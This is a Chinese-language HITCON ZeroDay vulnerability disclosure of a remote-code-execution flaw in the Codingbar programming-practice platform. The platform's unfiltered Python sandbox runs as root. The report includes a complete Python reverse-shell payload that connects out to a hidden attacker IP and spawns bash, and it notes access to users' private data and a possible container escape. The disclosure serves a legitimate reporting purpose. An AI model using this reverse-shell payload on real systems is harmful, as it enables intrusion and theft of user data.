瑞比智慧 Codingbar程式練習平台 RCE

Vulnerability Overview

ZDID: ZD-2023-01048
發信 Vendor: 瑞比智慧科技股份有限公司
Title: 瑞比智慧 Codingbar程式練習平台 RCE
Introduction: 透過練習平台所提供的python執行區可以打reverse shell反彈到攻擊者主機上造成RCE。

處理狀態

目前狀態

公開

Last Update : 2024/03/05

新提交
已審核
已通報
未回報修補狀況
未複測
公開

處理歷程

2023/12/21 23:08:54 : 新提交 (由 Whale120 更新此狀態)
2023/12/29 10:59:08 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/01/18 15:57:52 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/01/18 15:57:52 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/03/05 03:00:06 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2023-01048
通報者：WH_ALE (Whale120)
風險：嚴重
類型：遠端命令執行 (Remote Code Execution)

參考資料

攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。

漏洞說明： OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection

漏洞說明： OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection

漏洞說明： CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html

漏洞說明： CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

平台有提供如圖的coding區域給使用者輸入程式碼並執行

然而，該執行區並未過濾使用者輸入的程式碼，導致可以使用os, socket等系統相關的library並反彈reverse shell至攻擊者端
而且使用者身分為最高權限的root
reverse shell payload:

import socket,subprocess,os
ip="<已隱藏>"
port=8040
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,port));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2)
import pty
pty.spawn("bash")

進去後，會發現許多使用者資料夾如圖：

而這些資料夾中也會有使用者電子郵件的學校或者單位等隱私，如圖：

本環境為docker容器，然而，根據滲透測試工具linPeas的結果，是很有可能可以突破的，如圖：